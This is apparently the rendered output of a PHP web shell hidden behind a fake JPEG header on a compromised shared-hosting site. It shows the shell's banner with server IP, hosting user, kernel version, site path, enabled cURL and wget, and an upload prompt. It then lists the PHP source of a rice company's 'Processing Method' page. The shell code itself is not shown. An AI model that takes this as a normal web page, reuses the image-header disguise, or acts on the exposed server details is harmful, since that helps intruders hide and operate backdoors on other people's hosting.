���� JFIF fdasasfas213sdaf
Server IP : 147.79.69.177 / Your IP : 216.73.216.200 Web Server : LiteSpeed System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64 User : u479334040 ( 479334040) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u479334040/domains/justdial4web.com/public_html/asati/ |
Upload File : |
<?php include 'header.php';?> <section class="innerwrapper"> <div class="container"> <h1>Proceecing Method</h1> <div class="div_content"> <div class="col"> <div class="tab"> <button class="tablinks active" onclick="openCity(event, 'London')">AGEING</button> <button class="tablinks" onclick="openCity(event, 'Paris')">QUALITY ASSURANCE</button> <button class="tablinks" onclick="openCity(event, 'Tokyo')">SOURCING</button> <button class="tablinks" onclick="openCity(event, 'Milling')">MILLING AND PROCESSING </button> </div> <div id="London" class="tabcontent" style="display:block"> <h3>AGEING</h3> <p> <img src="images/1.jpg" alt=""> We age our paddy in large tanks & silos for months to create fluffy, straight, separated and non-sticky grains. </p> </div> <div id="Paris" class="tabcontent"> <h3>QUALITY ASSURANCE</h3> <p> <img src="images/3.jpg" alt=""> Tests are performed at every step from sourcing to final dispatch of the product. Our rice is processed in fully automated and highest technology machines. We guarantee 100% best cooking of our rice.</p> </div> <div id="Tokyo" class="tabcontent"> <h3>SOURCING</h3> <p> <img src="images/2.jpg" alt=""> Raw paddy is purchased from local mandis and farmer all over the India.</p> </div> <div id="Milling" class="tabcontent"> <h3>MILLING AND PROCESSING</h3> <p> <img src="images/4.jpg" alt=""> The rice is then subjected to a rigorous process of cleaning, separation, dehusking, sizing, polishing, colour sorting and grading before they are stored safely in our state-of-the-art grain silos. Every step along in the way is tightly controlled and analyzed to maintain the highest quality. </p> </div> </div> </div> </div> </section> <?php include 'our-products.php';?> <?php include 'footer.php';?>